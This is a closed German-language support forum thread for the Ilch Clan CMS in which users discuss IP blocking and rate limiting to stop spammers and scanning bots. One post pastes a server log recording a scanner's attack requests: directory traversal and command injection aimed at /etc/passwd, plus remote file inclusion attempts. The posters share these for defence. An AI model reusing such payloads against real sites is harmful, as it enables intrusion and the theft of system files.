ilch Forum » Ilch Clan 1.1 » Allgemein » IP Sperrung?

Geschlossen
  1. #1
    User Pic
    wittenberg gelöschter User
    Ihr müsst mal eine IP-Sperrung einrichten, weil bei uns immer ein kommt und nur scheisse ins gästebuch und forum schreibt
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    maddin Mitglied
    Registriert seit
    18.04.2004
    Beiträge
    21
    Beitragswertungen
    0 Beitragspunkte
    da hilft ne ip sperre auch nüscht
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    manuel ilch-Gründer
    Registriert seit
    22.03.2003
    Beiträge
    4.260
    Beitragswertungen
    4 Beitragspunkte
    ja wird im gästebuch eingebaut werden!!

    aber wie der maddin schon sagte so richtig viel hilft absolut nix, ich werde aber ip sperre + max läünge des textes + session sperre einbauen.
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    DeepII gelöschter User
    Das is cool *gg*! Aber was is mit einem "badword"-filter? Dann können die Leute nicht mehr so viel Müll schreiben.
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    Nico Mitglied
    Registriert seit
    11.05.2004
    Beiträge
    21
    Beitragswertungen
    0 Beitragspunkte
    Ich erkläre mal warum eine direkte ip sperre nicht möglich ist:
    Das liegt einfach daran, dass der Provider je nach dem wie die IP Adressen gerade frei bzw. belegt sind immer wieder beim reconnecten ins internet eine neue ip vergibt. Das heist eine IP kann nur gebannt werden wenn der user eine feste ip adresse hat, aber kein normaler mensch hat eine solche, weil die einfach zu teuer wäre. Eine feste ip ist ausserdem auch nur zb bei servern nötig, weil alle daten zb einer homepage immer wieder vom server mit der gleichen ip geladen werden.
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    manuel ilch-Gründer
    Registriert seit
    22.03.2003
    Beiträge
    4.260
    Beitragswertungen
    4 Beitragspunkte
    ja genau, anzumerken wäre nur noch das es natürlich sehr aufwendig ist immer wieder neu zu connectend nur weil man spammen möchte.
    also ist eine ip sperrung schon eine relativ wirkungsvolle abwehr. am besten ist natürlich ip + cookie und wenn möglich noch diesen host dings weisst du da auch etwas drüber nico?

    werden dann alle eines anbieters gebant oder nur bestimmte leute?... also man kann anhand der ip so den hostname raus bekommen. bei google bots z.b. crawler13.googlebot.com +g+

    wenn ich jetzt diesen crawler13 banne dann issa wech weil der kommt evtl. auch nicht immer mti der selben ip aber hostname ist dann gleich? ich peil da erlich gesagt nicht so durch, hast du davon ahnung?
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    arGoN Mitglied
    Registriert seit
    08.06.2004
    Beiträge
    11
    Beitragswertungen
    0 Beitragspunkte
    im IRC kann man sich das scripten.

    wies mit foren etc aussieht weiss ich nicht^^


    Zuletzt geändert von arGoN am 09.06.2004 - 17:56
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    DeepII gelöschter User
    @Nico
    Das mit der IP-Adresse stimmt scho, aber was ist wenn man von einem Server zugespammt wird? z.B. bei einer Firma, die gehen doch alle über dieselbe IP ins Netz, und die ham dann auch ne feste. Wenn man die dann sperrt, dann können die nimmer spammen! und außerdem is das mit den IP's net so ganz richtig. hier in Deutschland bekommt man immer eine neue IP, in Israel z.B. hat man aber immer dieselbe so weit ich weiß. (Ich weiß, das man von denen zugespammt wird passiert eher weniger, das war nur zur Info)
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Also was ich gern hätte ist eine Sperre, die nach einer bestimmten Anzahl von Aufrufen innerhalb eines bestimmten Zeitrahmens greift.

    Also z.B. 5 Seiteaufrufe innerhalb 10sek -> Sperre für 24h

    Also um sowas zu unterdrücken:

    ZitatZitat

    / 04.12.2008 / 01:11:37 / 194.150.236.3 -> /index.php?news-121=&sid=http://digital.orf.at/rte/upload/diverses/4px.gif%00
    / 04.12.2008 / 01:11:37 / 194.150.236.3 -> /index.php?news-121=&sid=http://digital.orf.at/rte/upload/diverses/4px.gif?
    / 04.12.2008 / 01:11:37 / 194.150.236.3 -> /index.php?news-121=&sid=/etc/passwd%00
    / 04.12.2008 / 01:11:38 / 194.150.236.3 -> /index.php?news-121=&sid=/etc/passwd
    / 04.12.2008 / 01:11:38 / 194.150.236.3 -> /index.php?news-121=/../../../../../../../../../../etc/passwd%00&sid=6ef691ff381b22cedf93ae69f5222aa7
    / 04.12.2008 / 01:11:38 / 194.150.236.3 -> /index.php?news-121=&sid=../../../../../../../../../../etc/passwd
    Gast / 04.12.2008 / 01:11:38 / 194.150.236.3 -> /index.php?news-121=cat+/etc/passwd|&sid=6ef691ff381b22cedf93ae69f5222aa7
    / 04.12.2008 / 01:11:38 / 194.150.236.3 -> /index.php?news-121=&sid=/../../../../../../../../../../etc/passwd
    Gast / 04.12.2008 / 01:11:39 / 194.150.236.3 -> /index.php?news-121=|cat+/etc/passwd|&sid=6ef691ff381b22cedf93ae69f5222aa7
    Gast / 04.12.2008 / 01:11:39 / 194.150.236.3 -> /index.php?news-121=http://digital.orf.at/rte/upload/diverses/4px.gif?&sid=6ef691ff381b22cedf93ae69f5222aa7
    / 04.12.2008 / 01:11:39 / 194.150.236.3 -> /index.php?news-121=&sid=../../../../../../../../../../etc/passwd%00
    / 04.12.2008 / 01:11:39 / 194.150.236.3 -> /index.php?news-121=&sid=/../../../../../../../../../../etc/passwd%00
    Gast / 04.12.2008 / 01:11:39 / 194.150.236.3 -> /index.php?news-121=http://digital.orf.at/rte/upload/diverses/4px.gif%00&sid=6ef691ff381b22cedf93ae69f5222aa7
    Gast / 04.12.2008 / 01:11:40 / 194.150.236.3 -> /index.php?news-121=/etc/passwd&sid=6ef691ff381b22cedf93ae69f5222aa7
    Gast / 04.12.2008 / 01:11:40 / 194.150.236.3 -> /index.php?news-121=/etc/passwd%00&sid=6ef691ff381b22cedf93ae69f5222aa7
    / 04.12.2008 / 01:11:40 / 194.150.236.3 -> /index.php?news-121=&sid=cat+/etc/passwd|
    / 04.12.2008 / 01:11:40 / 194.150.236.3 -> /index.php?news-121=&sid=|cat+/etc/passwd|
    Gast / 04.12.2008 / 01:11:41 / 194.150.236.3 -> /index.php?news-121=../../../../../../../../../../etc/passwd&sid=6ef691ff381b22cedf93ae69f5222aa7
    Gast / 04.12.2008 / 01:11:41 / 194.150.236.3 -> /index.php?news-121=../../../../../../../../../../etc/passwd%00&sid=6ef691ff381b22cedf93ae69f5222aa7
    Gast / 04.12.2008 / 01:11:41 / 194.150.236.3 -> /index.php?news-121=/../../../../../../../../../../etc/passwd&sid=6ef691ff381b22cedf93ae69f5222aa7


    Diese Crawler gehen mir nämlich tierisch auf den Geist. Und derzeit versenden sie danach ja gleich mal schicke Trojaner an die abgefassten Mailadressen bzw. sie nehmen einfach die Namen der registrierten und setzen den Domainnamen dahinter.


    Zuletzt modifiziert von Cmdr. b0b am 04.12.2008 - 15:31:26
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    Son!c Hall Of Fame
    Registriert seit
    14.09.2006
    Beiträge
    3.766
    Beitragswertungen
    5 Beitragspunkte
    das würde sowieso nicht funktionieren ...
    Nimm das Leben nicht zu ernst, du kommst sowieso nicht lebend raus.
    0 Mitglieder finden den Beitrag gut.
  11. #11
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Was würde nicht funktionieren?
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  12. #12
    User Pic
    Son!c Hall Of Fame
    Registriert seit
    14.09.2006
    Beiträge
    3.766
    Beitragswertungen
    5 Beitragspunkte
    ip sperrung ... kurz rooter neu starten oder rechner und schon hast du ne neue ip - außerdem sind das bots, die surfen mit mehreren ips gleichzeitig ... nehm ich mal an ^.^
    Nimm das Leben nicht zu ernst, du kommst sowieso nicht lebend raus.
    0 Mitglieder finden den Beitrag gut.
  13. #13
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Genau das tun sie eben nicht wie Du oben siehst. Und wie Manuel schon sagte, jedes mal neu starten ist zu lästig.
    Wie kann man nu umsetzen, das nach einer bestimmten Anzahl an Zugriffen innerhalb eines bestimmten Zeitraumes die betreffende IP gesperrt wird?
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  14. #14
    User Pic
    Panicsheep Hall Of Fame
    Registriert seit
    24.08.2004
    Beiträge
    10.192
    Beitragswertungen
    16 Beitragspunkte
    IP's und Zeiten in der DB bei jedem Zugriff speichern und abfragen ob die IP schon 5 Zugriffe hatte und wie groß die zeitliche Differenz zwischen dem 5ten und dem 6ten (neusten) Zugriff ist.
    Und wenn diese kleiner als der gewünschte Wert ist, dann wird die IP gesperrt.
    Dazu muss aber auch ein IP Sperrsystem grundsätzlich vorhanden sein.

    Sowas ist sicherlich nicht in 5 Minuten realisiert.
    Omnia bona erunt
    0 Mitglieder finden den Beitrag gut.
  15. #15
    User Pic
    boehserdavid Mitglied
    Registriert seit
    26.08.2006
    Beiträge
    2.122
    Beitragswertungen
    2 Beitragspunkte
    Hey, Cmdr. b0b!

    In deiner Log ist zu erkennen, dass jemand versucht hat auf dein System zuzugreifen, per shell99 (würd ich mal behaupten). Das hatte ich auch schonmal.
    IP Sperrung ist die falsche Lösung. Diese Leute muss man ärgern.

    Um dir mal zu zeigen wie so etwas aussehen kann.

    http://www.baduncles.de/news.html?egal=http://abjetztistegal.washiersteht.xyz

    Steht in der URL http oder www (nach .de/) wird automatisch eine Weiterleitung erzwungen, der User kann dagegen nix machen.
    [Öffne den Link nur in einem neuen Browserfenster, bzw. habe neben diesem Fenster dann nix anderes im Browser offen, warum sie selbst.]

    Weil wenn jemand an deine Daten ran will, musst du ihn nicht sperren ( IPwechsel dauert bei mir, 3sek, gekoppelt über ein Prog), sondern nerven.
    -Heute schon böhse gewesen?- Ab zur Community
    -No Support via Contact-
    0 Mitglieder finden den Beitrag gut.
  16. #16
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Sieht schick aus. Und wie richtet man das ein? lachen

    Allerdings is der ein Extremfall. Der hat ja versucht irgendwelche Passwörter in irgendwelchen Ordnern aufzuspüren. Die normalen Crawler folgen ja einfach den Links auf der Seite um nach verwertbaren Infos zu suchen.

    Das Ergebnis sieht dann so aus:

    ZitatZitat

    Gast / 27.11.2008 / 06:47:36 / 81.169.174.206 -> /index.php?gbook&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:47:37 / 81.169.174.206 -> /index.php?newsextended&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:47:41 / 81.169.174.206 -> /index.php?forum&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:47:43 / 81.169.174.206 -> /index.php?googlemap&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:47:45 / 81.169.174.206 -> /index.php?phgstats&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:48:16 / 81.169.174.206 -> /index.php?vote&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:48:18 / 81.169.174.206 -> /index.php?impressum&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:48:20 / 81.169.174.206 -> /index.php?teams&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:48:26 / 81.169.174.206 -> /index.php?joinus&sid=e678836a2eebb4ea6c678750cddb5681
    Gast / 27.11.2008 / 06:48:28 / 81.169.174.206 -> /index.php?joinus
    Gast / 27.11.2008 / 06:48:29 / 81.169.174.206 -> /index.php?joinus


    Und im Endeffekt entstehen solche Mails:

    ZitatZitat

    Sehr geehrte Damen und Herren,

    Ihre Email "tibby@labersack-clan.de" wird wegen Missbrauch innerhalb der naechsten 24 Stunden gesperrt. Es sind 59 Beschwerden wegen Spamversand bei uns eingegangen.
    Details und moegliche Schritte zur Entsperrung finden Sie im Anhang.


    Im Anhang natürlich ein wunderschöner Trojaner.

    Interessanterweise existiert diese Mailadresse gar nicht.

    Ich denke das grundgerüst für eine Sperre ist ja schon gegeben durch den IP-Logger. Dieser zeichnet ja Zeit und IP schon auf.

    Was ich mir vorstelle, ist eine Art Zähler. Also er nimmt die IP, checkt in der Datenbank ob sie vor weniger als zehn Sekunden schonmal auf die Seite zugegriffen hat und trägt sie in eine Tabelle ein. Sollte das wieder passieren wird der Zähler um 1 erhöht. Erreicht der Zähler beispielsweise 4, wird die IP für 60 min gesperrt.
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  17. #17
    User Pic
    Akira Mitglied
    Registriert seit
    25.01.2007
    Beiträge
    1.369
    Beitragswertungen
    1 Beitragspunkte
    reconnect.....
    externer Link Visit Us zwinker
    Neue Scripte: JQuery Login usw... Turnier(externer Link Multi-Bewertung, Refferer, Forum Upload, E-Mail login
    0 Mitglieder finden den Beitrag gut.
  18. #18
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Danke Akira. Super hilfreich.
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  19. #19
    User Pic
    Akira Mitglied
    Registriert seit
    25.01.2007
    Beiträge
    1.369
    Beitragswertungen
    1 Beitragspunkte
    ja bitte aber dir is doch klar das IP sperren sinnlos sind?


    die frage ist wie greift der spambot auf deine user zu'????


    Zuletzt modifiziert von Akira am 05.12.2008 - 13:31:20
    externer Link Visit Us zwinker
    Neue Scripte: JQuery Login usw... Turnier(externer Link Multi-Bewertung, Refferer, Forum Upload, E-Mail login
    0 Mitglieder finden den Beitrag gut.
  20. #20
    User Pic
    Cmdr. b0b Mitglied
    Registriert seit
    30.10.2008
    Beiträge
    50
    Beitragswertungen
    0 Beitragspunkte
    Und Dir ist schon klar, das nicht alle Crawler hier im Hosenscheisserland sitzen, in dem provider Angst davor haben das der Anschluss für einen Server genutzt wird? Andere Länder haben feste IP's. Ausserdem ist mit so einem Script erstmal Schluss mit dem durchsuchen nach einigen Zugriffen. Wie lange man die IP sperrt ist dann ne ganz andere Frage.

    Auf Userdetails greift er zu wie jeder andere. Indem er einfach den Links auf der Seite folgt.

    Und nun möchte ich drum bitten, nicht immer die Antwort mit den DSL-Scheuklappen zu geben. Sie passt nämlich überhaupt nicht zum Thema.
    Das Leben is zu kurz für ein langes Gesicht.
    0 Mitglieder finden den Beitrag gut.
  21. #21
    User Pic
    spidy Mitglied
    Registriert seit
    19.01.2009
    Beiträge
    20
    Beitragswertungen
    0 Beitragspunkte
    ZitatZitat geschrieben von boehserdavid

    Hey, Cmdr. b0b!

    In deiner Log ist zu erkennen, dass jemand versucht hat auf dein System zuzugreifen, per shell99 (würd ich mal behaupten). Das hatte ich auch schonmal.
    IP Sperrung ist die falsche Lösung. Diese Leute muss man ärgern.

    Um dir mal zu zeigen wie so etwas aussehen kann.

    http://www.baduncles.de/news.html?egal=http://abjetztistegal.washiersteht.xyz

    Steht in der URL http oder www (nach .de/) wird automatisch eine Weiterleitung erzwungen, der User kann dagegen nix machen.
    [Öffne den Link nur in einem neuen Browserfenster, bzw. habe neben diesem Fenster dann nix anderes im Browser offen, warum sie selbst.]

    Weil wenn jemand an deine Daten ran will, musst du ihn nicht sperren ( IPwechsel dauert bei mir, 3sek, gekoppelt über ein Prog), sondern nerven.


    Hallo boehserdavid,

    genial! Wie mach ich das? Ganz Verstanden hab ichs nicht.

    Danke im Voraus
    spidy
    Oooo weh, ich bin ein alter Sack!
    0 Mitglieder finden den Beitrag gut.
  22. #22
    User Pic
    marvman Mitglied
    Registriert seit
    22.05.2006
    Beiträge
    587
    Beitragswertungen
    3 Beitragspunkte
    Hallo

    Würde mich aus sehr interessieren wir man das Umsetzt boehserdavid


    Greetz Marv
    0 Mitglieder finden den Beitrag gut.
  23. #23
    User Pic
    GeCk0 Hall Of Fame
    Registriert seit
    01.05.2009
    Beiträge
    2.989
    Beitragswertungen
    96 Beitragspunkte
    omg, der Beitrag ist von 2004

    .. hier probiers damit:
    externer Link
    Alle Module von mir sind nun unter php-gecko.de erreichbar
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Allgemein

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten